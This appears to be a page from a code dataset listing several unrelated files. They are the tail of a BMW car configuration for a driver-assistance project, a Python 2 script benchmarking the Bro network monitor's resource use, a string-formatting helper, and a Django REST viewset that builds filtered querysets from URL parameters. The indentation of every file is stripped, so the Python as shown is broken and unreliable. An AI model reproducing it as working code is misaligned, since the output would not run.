CAR.E82: [{**BMW_Eseries, **{512: 8}}], #add CruiseControlStatus message for VO540 option
}
DBC = {
CAR.E82_DCC: dbc_dict('bmw_e9x_e8x', 'toyota_adas'), #'toyota_adas' for potentially retrofitted radar
CAR.E90_DCC: dbc_dict('bmw_e9x_e8x', 'toyota_adas'),
CAR.E82: dbc_dict('bmw_e9x_e8x', 'toyota_adas'),
CAR.E90: dbc_dict('bmw_e9x_e8x', 'toyota_adas')
}
STEER_THRESHOLD = 100 # retrofited actuator
NO_DSU_CAR = [CAR.E82_DCC, CAR.E90_DCC, CAR.E82, CAR.E90] #Indicate which cars don't have radar installed
TSS2_CAR = []
|
#!/usr/bin/env python
import sys
import imp
import os
import subprocess
from datetime import datetime
import csv
import tempfile
def main():
if len(sys.argv) != 2:
print 'Usage: ./broeval.py <configfile>'
return
(cfgpath, cfgname) = os.path.split(sys.argv[1])
(cfgname, cfgext) = os.path.splitext(cfgname)
(cfgfile, cfgfilename, cfgdata) = imp.find_module(cfgname, [cfgpath])
config = imp.load_module(cfgname, cfgfile, cfgfilename, cfgdata)
sources = map(lambda (i, s): (s, config.SOURCE_BRO[i]), enumerate(config.SOURCE))
targets = map(lambda (i, s): (s, config.TARGET_BRO[i]), enumerate(config.TARGET))
print 'Welcome to broeval.py'
print ''
print 'Config: %s' % sys.argv[1]
for src, srcb in sources:
print 'Source: %s (with Bro %s)' % (src, 'ENABLED' if srcb else 'DISABLED')
for tgt, tgtb in targets:
print 'Target: %s (with Bro %s)' % (tgt, 'ENABLED' if tgtb else 'DISABLED')
print "C'Mode: %s" % config.MODE
print 'Epochs: %i' % config.EPOCHS
print "Iter's: %i" % config.ITER
print 'Size : 10^%i bytes' % config.SIZE
print 'Result: %s' % config.OUTFILE
print ''
# 1. Reset the environment (terminate Bro if still running)
for src, srcb in sources:
print 'Terminating Bro on source machine %s' % src
print os.popen('./helpers/brokill.sh %s' % src).read()
for tgt, tgtb in targets:
print 'Terminating Bro on target machine %s' % tgt
print os.popen('./helpers/brokill.sh %s' % tgt).read()
csvfile = open(config.OUTFILE, 'wb')
csvwriter = csv.writer(csvfile)
csvwriter.writerow(['SOURCE', 'SOURCE_BRO', 'TARGET', 'TARGET_BRO', 'MODE', 'EPOCHS', 'ITER', 'SIZE', 'seconds', 'sourcecpu', 'sourcemem', 'targetcpu', 'targetmem'])
# 2. Start Bro (if requested)
for src, srcb in sources:
if srcb:
print 'Starting Bro on source machine %s' % src
print os.popen('./helpers/brostart.sh %s' % src).read()
for tgt, tgtb in targets:
if tgtb:
print 'Starting Bro on target machine %s' % tgt
print os.popen('./helpers/brostart.sh %s' % tgt).read()
for epoch in range(config.EPOCHS):
print '---- %s - EPOCH %i - %s ----' % (sys.argv[1], epoch, datetime.now().time())
sourcestat = [None] * len(sources)
targetstat = [None] * len(targets)
# If Bro is enabled, start collecting CPU / mem statistics
for i, (src, srcb) in enumerate(sources):
if srcb:
sourcestat[i] = subprocess.Popen(['./helpers/brostat.sh', src], stdout=subprocess.PIPE)
for i, (tgt, tgtb) in enumerate(targets):
if tgtb:
targetstat[i] = subprocess.Popen(['./helpers/brostat.sh', tgt], stdout=subprocess.PIPE)
# Run the data transfer
processes = []
tempfiles = []
seconds = []
for i, (src, srcb) in enumerate(sources):
processes.append([])
tempfiles.append([])
seconds.append([])
for j, (tgt, tgtb) in enumerate(targets):
processes[i].append(None)
tempfiles[i].append(None)
seconds[i].append(.0)
filed, filename = tempfile.mkstemp()
tempfiles[i][j] = [os.fdopen(filed), filename]
processes[i][j] = subprocess.Popen(['./helpers/%s.sh' % config.MODE, src, tgt, str(config.ITER), str(config.SIZE)], stdout=subprocess.PIPE, stderr=tempfiles[i][j][0])
for i, (src, srcb) in enumerate(sources):
for j, (tgt, tgtb) in enumerate(targets):
processes[i][j].wait()
tempfiles[i][j][0].close()
tempfiles[i][j][0] = open(tempfiles[i][j][1], 'r')
seconds[i][j] = float(tempfiles[i][j][0].readlines()[-1].strip())
tempfiles[i][j][0].close()
os.remove(tempfiles[i][j][1])
print 'source %s, target %s: %.2f seconds.' % (src, tgt, seconds[i][j])
# If Bro is enabled, stop collecting CPU / mem statistics
sourcecpu = [.0] * len(sources)
sourcemem = [.0] * len(sources)
targetcpu = [.0] * len(targets)
targetmem = [.0] * len(targets)
for i, (src, srcb) in enumerate(sources):
if srcb:
sourcestat[i].kill()
outs, errs = sourcestat[i].communicate()
lines = outs.split('\n')
linecount = 0
for line in lines:
if line and line.split()[0] != '%CPU':
linecount += 1
sourcecpu[i] += float(line.split()[0].replace(',', '.'))
sourcemem[i] += float(line.split()[1])
sourcecpu[i] /= linecount
sourcemem[i] /= linecount
print 'Bro @ source %s took on average %.2f%% CPU and %.0f KB of physical memory.' % (src, sourcecpu[i], sourcemem[i])
for i, (tgt, tgtb) in enumerate(targets):
if tgtb:
targetstat[i].kill()
outs, errs = targetstat[i].communicate()
lines = outs.split('\n')
linecount = 0
for line in lines:
if line and line.split()[0] != '%CPU':
linecount += 1
targetcpu[i] += float(line.split()[0].replace(',', '.'))
targetmem[i] += float(line.split()[1])
targetcpu[i] /= linecount
targetmem[i] /= linecount
print 'Bro @ target %s took on average %.2f%% CPU and %.0f KB of physical memory.' % (tgt, targetcpu[i], targetmem[i])
for i, (src, srcb) in enumerate(sources):
for j, (tgt, tgtb) in enumerate(targets):
csvwriter.writerow([src, srcb, tgt, tgtb, config.MODE, config.EPOCHS, config.ITER, config.SIZE, seconds[i][j], sourcecpu[i], sourcemem[i], targetcpu[j], targetmem[j]])
print '\n'
# Terminate Bro
csvfile.close()
for src, srcb in sources:
if srcb:
print 'Terminating Bro on source machine %s' % src
print os.popen('./helpers/brokill.sh %s' % src).read()
for tgt, tgtb in targets:
if tgtb:
print 'Terminating Bro on target machine %s' % tgt
print os.popen('./helpers/brokill.sh %s' % tgt).read()
if __name__ == '__main__':
main()
|
def str_format(s, *args, **kwargs):
"""Return a formatted version of S, using substitutions from args and kwargs.
(Roughly matches the functionality of str.format but ensures compatibility with Python 2.5)
"""
args = list(args)
x = 0
while x < len(s):
# Skip non-start token characters
if s[x] != '{':
x += 1
continue
end_pos = s.find('}', x)
# If end character can't be found, move to next character
if end_pos == -1:
x += 1
continue
name = s[x + 1:end_pos]
# Ensure token name is alpha numeric
if not name.isalnum():
x += 1
continue
# Try find value for token
value = args.pop(0) if args else kwargs.get(name)
if value:
value = str(value)
# Replace token with value
s = s[:x] + value + s[end_pos + 1:]
# Update current position
x = x + len(value) - 1
x += 1
return s
|
# coding: utf-8
import ast
from datetime import timedelta
from django.core.exceptions import EmptyResultSet, FieldDoesNotExist
from django.db import ProgrammingError
from django.db.models import functions
from django.db.models.query import F, Prefetch, QuerySet
from django.utils.timezone import now
from rest_framework import serializers, viewsets
from rest_framework.exceptions import ValidationError
from rest_framework.schemas import AutoSchema
from common.api.fields import ChoiceDisplayField, ReadOnlyObjectField
from common.api.utils import AGGREGATES, CASTS, FUNCTIONS, RESERVED_QUERY_PARAMS, parse_filters, url_value
from common.models import Entity, MetaData
from common.settings import settings
from common.utils import get_field_by_path, get_pk_field, str_to_bool
class CommonModelViewSet(viewsets.ModelViewSet):
"""
Définition commune de ModelViewSet pour l'API REST
"""
url_params = {}
schema = AutoSchema()
def get_serializer_class(self):
# Le serializer par défaut est utilisé en cas de modification/suppression
default_serializer = getattr(self, "default_serializer", None)
if default_serializer and self.action not in ("list", "retrieve", "update", "partial_update"):
return default_serializer
# Le serializer peut être substitué en fonction des paramètres d'appel de l'API
query_params = getattr(self.request, "query_params", None)
url_params = self.url_params or (query_params.dict() if query_params else {})
if default_serializer:
# Fonction utilitaire d'ajout de champ au serializer
def add_field_to_serializer(fields, field_name):
if not field_name:
return
field_name = field_name.strip()
source = field_name.replace(".", "__")
# Champ spécifique en cas d'énumération
choices = getattr(get_field_by_path(self.queryset.model, field_name), "flatchoices", None)
if choices and str_to_bool(url_params.get("display")):
fields[field_name + "_display"] = ChoiceDisplayField(choices=choices, source=source)
# Champ spécifique pour l'affichage de la valeur
fields[field_name] = ReadOnlyObjectField(source=source if "." in field_name else None)
# Ajoute les champs d'annotation au serializer
annotations = {}
for annotation in FUNCTIONS.keys():
for field in url_params.get(annotation, "").split(","):
if not field:
continue
field_name = annotation + "__" + field.strip()
field_name, *args = field_name.split("|")
if any(field_name.endswith(":{}".format(cast)) for cast in CASTS):
field_name, cast = field_name.split(":")
source = field_name.replace(".", "__") if "." in field else None
annotations[field_name] = serializers.ReadOnlyField(source=source)
# Ajoute les champs d'aggregation au serializer
aggregations = {}
for aggregate in AGGREGATES.keys():
for field in url_params.get(aggregate, "").split(","):
if not field:
continue
field_name = aggregate + "__" + field.strip()
field_name, *args = field_name.split("|")
if any(field_name.endswith(":{}".format(cast)) for cast in CASTS):
field_name, cast = field_name.split(":")
source = field_name.replace(".", "__") if "." in field else None
aggregations[field_name] = serializers.ReadOnlyField(source=source)
# Ajoute les regroupements au serializer
if "group_by" in url_params or aggregations:
fields = {}
for field in url_params.get("group_by", "").split(","):
add_field_to_serializer(fields, field)
fields.update(aggregations)
# Un serializer avec les données regroupées est créé à la volée
return type(default_serializer.__name__, (serializers.Serializer,), fields)
# Ajoute la restriction des champs au serializer
elif "fields" in url_params:
fields = {}
for field in url_params.get("fields").split(","):
add_field_to_serializer(fields, field)
# Un serializer avec restriction des champs est créé à la volée
return type(default_serializer.__name__, (serializers.Serializer,), fields)
# Utilisation du serializer simplifié
elif str_to_bool(url_params.get("simple")):
serializer = getattr(self, "simple_serializer", default_serializer)
serializer._declared_fields.update(annotations)
return serializer
# Utilisation du serializer par défaut en cas de mise à jour sans altération des données
elif self.action in ("update", "partial_update"):
return default_serializer
# Ajoute les annotations au serializer par défaut
elif not aggregations and annotations:
serializer = super().get_serializer_class()
serializer._declared_fields.update(annotations)
return serializer
return super().get_serializer_class()
def perform_create(self, serializer):
if issubclass(serializer.Meta.model, Entity):
return serializer.save(_current_user=self.request.user)
return super().perform_create(serializer)
def perform_update(self, serializer):
if issubclass(serializer.Meta.model, Entity):
return serializer.save(_current_user=self.request.user)
return super().perform_update(serializer)
def perform_destroy(self, instance):
if isinstance(instance, Entity):
return instance.delete(_current_user=self.request.user)
return super().perform_destroy(instance)
def list(self, request, *args, **kwargs):
# Détournement en cas d'aggregation sans annotation ou de non QuerySet
queryset = self.get_queryset()
if not isinstance(queryset, QuerySet):
from rest_framework.response import Response
return Response(queryset)
try:
return super().list(request, *args, **kwargs)
except (AttributeError, FieldDoesNotExist) as error:
self.queryset_error = error
raise ValidationError(dict(error="fields: {}".format(error)), code="fields")
def paginate_queryset(self, queryset):
# Aucune pagination si toutes les données sont demandées ou qu'il ne s'agit pas d'un QuerySet
if not isinstance(queryset, QuerySet) or str_to_bool(self.request.query_params.get("all", None)):
return None
try:
return super().paginate_queryset(queryset)
except ProgrammingError as error:
raise ValidationError(dict(error="page: {}".format(error)), code="page")
def get_queryset(self):
# Evite la ré-évaluation du QuerySet en cas d'erreur
if getattr(self, "queryset_error", False):
return
try:
# Détournement en cas d'aggregation sans annotation ou de non QuerySet
queryset = super().get_queryset()
if not isinstance(queryset, QuerySet):
return queryset
options = dict(aggregates=None, annotates=None, distinct=None, filters=None, order_by=None)
self.url_params = url_params = self.request.query_params.dict()
# Mots-clés réservés dans les URLs
default_reserved_query_params = ["format"] + (
[self.paginator.page_query_param, self.paginator.page_size_query_param] if self.paginator else []
)
reserved_query_params = default_reserved_query_params + RESERVED_QUERY_PARAMS
# Critères de recherche dans le cache
cache_key = url_params.pop("cache", None)
if cache_key:
from django.core.cache import cache
cache_params = cache.get(settings.API_CACHE_PREFIX + cache_key, {})
new_url_params = {}
new_url_params.update(**cache_params)
new_url_params.update(**url_params)
self.url_params = url_params = new_url_params
new_cache_params = {
key: value for key, value in url_params.items() if key not in default_reserved_query_params
}
if new_cache_params:
cache_timeout = int(url_params.pop("timeout", settings.API_CACHE_TIMEOUT)) or None
cache.set(settings.API_CACHE_PREFIX + cache_key, new_cache_params, timeout=cache_timeout)
options["cache_expires"] = now() + timedelta(seconds=cache_timeout) if cache_timeout else "never"
cache_url = "{}?cache={}".format(self.request.build_absolute_uri(self.request.path), cache_key)
plain_url = cache_url
for key, value in url_params.items():
url_param = "&{}={}".format(key, value)
if key in default_reserved_query_params:
cache_url += url_param
plain_url += url_param
options["cache_data"] = new_cache_params
options["cache_url"] = cache_url
options["raw_url"] = plain_url
# Erreurs silencieuses
silent = str_to_bool(url_params.get("silent", ""))
# Filtres (dans une fonction pour être appelé par les aggregations sans group_by)
def do_filter(queryset):
try:
filters, excludes = {}, {}
for key, value in url_params.items():
key = key.replace(".", "__")
if value.startswith("[") and value.endswith("]"):
value = F(value[1:-1].replace(".", "__"))
if key in reserved_query_params:
continue
if key.startswith("-"):
key = key[1:].strip()
excludes[key] = url_value(key, value)
else:
key = key[1:].strip() if key.startswith("+") else key.strip()
filters[key] = url_value(key, value)
if filters:
queryset = queryset.filter(**filters)
if excludes:
queryset = queryset.exclude(**excludes)
# Filtres génériques
others = url_params.get("filters", "")
if others:
queryset = queryset.filter(parse_filters(others))
if filters or others:
options["filters"] = True
except Exception as error:
if not silent:
raise ValidationError(dict(error="filters: {}".format(error)), code="filters")
options["filters"] = False
if settings.DEBUG:
options["filters_error"] = str(error)
return queryset
# Annotations
annotations = {}
try:
for annotation, function in FUNCTIONS.items():
for field_name in url_params.get(annotation, "").split(","):
if not field_name:
continue
field_name, *args = field_name.split("|")
function_args = []
for arg in args:
try:
function_args.append(ast.literal_eval(arg))
except (SyntaxError, ValueError):
arg = arg.replace(".", "__")
if any(arg.endswith(":{}".format(cast)) for cast in CASTS):
arg, *junk, cast = arg.split(":")
cast = CASTS.get(cast.lower())
arg = functions.Cast(arg, output_field=cast()) if cast else arg
function_args.append(arg)
field_name = field_name.replace(".", "__")
field = field_name
if any(field_name.endswith(":{}".format(cast)) for cast in CASTS):
field_name, *junk, cast = field_name.split(":")
cast = CASTS.get(cast.lower())
field = functions.Cast(field_name, output_field=cast()) if cast else field_name
annotations[annotation + "__" + field_name] = function(field, *function_args)
if annotations:
queryset = queryset.annotate(**annotations)
options["annotates"] = True
except Exception as error:
if not silent:
raise ValidationError(dict(error="annotates: {}".format(error)), code="annotates")
options["annotates"] = False
if settings.DEBUG:
options["annotates_error"] = str(error)
# Aggregations
aggregations = {}
if self.action == "list":
try:
for aggregate, function in AGGREGATES.items():
for field_name in url_params.get(aggregate, "").split(","):
if not field_name:
continue
distinct = field_name.startswith(" ") or field_name.startswith("+")
field_name = field_name[1:] if distinct else field_name
field_name = field_name.strip().replace(".", "__")
value = field_name
if any(field_name.endswith(":{}".format(cast)) for cast in CASTS):
field_name, *junk, cast = field_name.split(":")
cast = CASTS.get(cast.lower())
value = functions.Cast(field_name, output_field=cast()) if cast else value
aggregations[aggregate + "__" + field_name] = function(value, distinct=distinct)
group_by = url_params.get("group_by", "")
if group_by:
_queryset = queryset.values(*group_by.replace(".", "__").split(","))
if aggregations:
_queryset = _queryset.annotate(**aggregations)
else:
_queryset = _queryset.distinct()
queryset = _queryset
options["aggregates"] = True
elif aggregations:
options["aggregates"] = True
queryset = do_filter(queryset) # Filtres éventuels
return queryset.aggregate(**aggregations)
except ValidationError:
raise
except Exception as error:
if not silent:
raise ValidationError(dict(error="aggregates: {}".format(error)), code="aggregates")
options["aggregates"] = False
if settings.DEBUG:
options["aggregates_error"] = str(error)
# Filtres
queryset = do_filter(queryset)
# Tris
orders = []
try:
order_by = url_params.get("order_by", "")
if order_by:
for order in order_by.replace(".", "__").split(","):
nulls_first, nulls_last = order.endswith("<"), order.endswith(">")
order = order[:-1] if nulls_first or nulls_last else order
if order.startswith("-"):
orders.append(F(order[1:]).desc(nulls_first=nulls_first, nulls_last=nulls_last))
else:
order = order[1:] if order.startswith("+") or order.startswith(" ") else order
orders.append(F(order).asc(nulls_first=nulls_first, nulls_last=nulls_last))
temp_queryset = queryset.order_by(*orders)
str(temp_queryset.query) # Force SQL evaluation to retrieve exception
queryset = temp_queryset
options["order_by"] = True
except EmptyResultSet:
pass
except Exception as error:
if not silent:
raise ValidationError(dict(error="order_by: {}".format(error)), code="order_by")
options["order_by"] = False
if settings.DEBUG:
options["order_by_error"] = str(error)
# Distinct
distincts = []
try:
distinct = url_params.get("distinct", "")
if distinct:
distincts = distinct.replace(".", "__").split(",")
if str_to_bool(distinct) is not None:
distincts = []
queryset = queryset.distinct(*distincts)
options["distinct"] = True
except EmptyResultSet:
pass
except Exception as error:
if not silent:
raise ValidationError(dict(error="distinct: {}".format(error)), code="distinct")
options["distinct"] = False
if settings.DEBUG:
options["distinct_error"] = str(error)
# Requête simplifiée et/ou extraction de champs spécifiques
fields = url_params.get("fields", "")
if str_to_bool(url_params.get("simple", "")) or fields:
# Supprime la récupération des relations
if queryset.query.select_related:
queryset = queryset.select_related(None).prefetch_related(None)
# Champs spécifiques
try:
relateds = set()
field_names = set()
for field in fields.replace(".", "__").split(","):
if not field:
continue
field_names.add(field)
*related, field_name = field.split("__")
if related and field not in annotations:
relateds.add("__".join(related))
if relateds:
queryset = queryset.select_related(*relateds)
if field_names:
queryset = queryset.values(*field_names)
except Exception as error:
if not silent:
raise ValidationError(dict(error="fields: {}".format(error)), code="fields")
else:
# Récupération des métadonnées
metadata = str_to_bool(url_params.get("meta", ""))
if metadata and hasattr(self, "metadata"):
# Permet d'éviter les conflits entre prefetch lookups identiques
viewset_lookups = [
prefetch if isinstance(prefetch, str) else prefetch.prefetch_through
for prefetch in queryset._prefetch_related_lookups
]
lookups_metadata = []
for lookup in self.metadata or []:
if isinstance(lookup, str):
lookup = Prefetch(lookup)
if lookup.prefetch_through not in viewset_lookups:
lookups_metadata.append(lookup)
lookup.queryset = MetaData.objects.select_valid()
if lookups_metadata:
queryset = queryset.prefetch_related(*lookups_metadata)
# Ajout des options de filtres/tris dans la pagination
if self.paginator and hasattr(self.paginator, "additional_data"):
# Force un tri sur la clé primaire en cas de pagination
if hasattr(queryset, "ordered") and not queryset.ordered:
primary_key = get_pk_field(queryset.model)
queryset = queryset.order_by(
*(getattr(queryset, "_fields", None) or distincts or [primary_key.name])
)
self.paginator.additional_data = dict(options=options)
return queryset
except ValidationError as error:
self.queryset_error = error
raise error
class UserViewSet(CommonModelViewSet):
"""
ViewSet spécifique pour l'utilisateur
"""
def check_permissions(self, request):
# Autorise l'utilisateur à modifier ses propres informations ou les informations des utilisateurs en dessous
current_user = request.user
if current_user.is_superuser:
return True
elif self.action in ["create"]:
# Autorise la création pour tout le monde
return True
elif self.action in ["update", "partial_update"]:
# Autorise la modification de soi-même ou d'un autre utilisateur de rang inférieur
self.kwargs.update({self.lookup_field: self.kwargs.get(self.lookup_url_kwarg or self.lookup_field, None)})
user = self.get_object()
if (current_user == user) or (current_user.is_staff and not (user.is_staff or user.is_superuser)):
return True
# Applique le système de permissions dans les autres cas
return super().check_permissions(request)
def check_data(self, data):
# Assure que l'utilisateur ne s'octroie pas des droits qu'il ne peut pas avoir
user = self.request.user
if not user or (not user.is_staff and not user.is_superuser):
data["is_active"] = True
if not user or not user.is_staff:
data["is_staff"] = False
if not user or not user.is_superuser:
data["is_superuser"] = False
if "groups" in data and data.get("groups"):
if not user:
data["groups"] = []
elif not user.is_superuser:
groups = user.groups.all()
data["groups"] = list(set(groups) & set(data.get("groups", [])))
if "user_permissions" in data and data.get("user_permissions"):
if not user:
data["user_permissions"] = []
elif not user.is_superuser:
user_permissions = user.user_permissions.all()
data["user_permissions"] = list(set(user_permissions) & set(data.get("user_permissions", [])))
def perform_create(self, serializer):
self.check_data(serializer.validated_data)
super().perform_create(serializer)
def perform_update(self, serializer):
self.check_data(serializer.validated_data)
super().perform_update(serializer)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.